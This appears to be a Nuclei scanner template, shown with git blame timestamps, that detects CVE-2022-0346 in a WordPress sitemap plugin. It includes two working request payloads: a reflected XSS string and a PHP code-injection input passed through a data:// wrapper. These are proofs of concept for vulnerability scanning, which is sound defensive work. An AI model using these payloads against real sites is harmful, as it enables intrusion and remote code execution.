2022-05-19 17:59:08 +00:00
id : CVE-2022-0346
info :
2022-12-09 21:40:18 +00:00
name : WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
2022-11-14 07:56:06 +00:00
author : Akincibor,theamanrawat
2022-12-09 21:59:49 +00:00
severity : medium
2022-05-19 18:07:56 +00:00
description : |
2022-12-09 21:40:18 +00:00
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
2023-09-06 11:59:08 +00:00
remediation : |
Update the WordPress XML Sitemap Generator for Google plugin to version 2.0.4 or later to mitigate the XSS and RCE vulnerabilities.
2022-05-19 17:59:08 +00:00
reference :
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
2022-05-19 18:07:56 +00:00
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
2022-09-10 01:55:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0346
2022-05-30 09:21:28 +00:00
classification :
2022-12-09 21:59:49 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-10 01:55:52 +00:00
cve-id : CVE-2022-0346
2022-12-09 21:59:49 +00:00
cwe-id : CWE-79
2023-11-03 15:51:18 +00:00
epss-score : 0.00117
2023-11-10 17:07:52 +00:00
epss-percentile : 0.45428
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:*
2022-05-19 18:07:56 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : xmlsitemapgenerator
product : xml_sitemap_generator
2023-09-06 11:59:08 +00:00
framework : wordpress
2022-11-14 08:14:12 +00:00
tags : wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
2022-05-19 17:59:08 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-19 17:59:08 +00:00
- method : GET
path :
2022-05-19 18:07:56 +00:00
- '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
2022-11-13 11:37:15 +00:00
- '{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5("CVE-2022-0346");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp'
2022-05-19 17:59:08 +00:00
2022-08-29 17:23:18 +00:00
stop-at-first-match : true
2022-05-19 18:07:56 +00:00
req-condition : true
2022-05-19 17:59:08 +00:00
matchers :
- type : word
2022-11-13 11:31:19 +00:00
part : body_1
2022-05-19 17:59:08 +00:00
words :
2022-11-13 11:31:19 +00:00
- "<img src onerror=alert(document.domain)>"
- "Invalid Provider type specified"
condition : and
2022-09-10 01:55:52 +00:00
2022-11-13 11:31:19 +00:00
- type : word
part : body_2
words :
2022-11-14 07:56:06 +00:00
- "2ef3baa95802a4b646f2fc29075efe34"
2023-11-11 17:38:55 +00:00
# digest: 490a004630440220020d6f9d84900af63cf93a4dd1abb5c2915fe32a10ca01ca173e1e30176bdf5a022003875eccffbcc3fded69b251a1ba87492856eed910fa0a2fea149e6d6b4eed05:922c64590222798bb761d5b6d8e72950